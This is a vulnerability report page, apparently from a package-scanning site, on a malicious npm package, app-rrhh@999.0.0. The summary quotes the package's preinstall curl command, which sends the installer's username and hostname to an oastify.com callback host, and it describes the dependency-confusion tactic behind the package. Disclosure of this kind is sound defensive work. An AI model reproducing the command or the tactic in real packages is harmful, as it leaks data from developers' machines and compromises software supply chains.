Logo
npm

app-rrhh@999.0.0

Vulnerability report · Last retrieved from osv.dev September 14, 2026 at 6:23 PM UTC

Malicious

OSV ID

MAL-2026-16144

Ecosystem

npm

Summary

package.json declares a preinstall script that runs curl http://ebtld4p8aq3rl950g6jgn217aygp4fs4.oastify.com/$(whoami)/$(hostname) on npm install. The installer's OS username and hostname are embedded in the URL path and sent over plaintext HTTP to a Burp Collaborator (oastify.com) callback subdomain, confirming code execution on the installing host and leaking installer identity data to an attacker-controlled destination. The package name app-rrhh at version 999.0.0 with a description referencing dependency confusion is consistent with a dependency-confusion attack shape designed to win resolution against an internal package of the same name.

Source: amazon-inspector (cda153823a2c046e4d97069c84961e1a8b302fc425e238fce36bd8a205d19b88)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.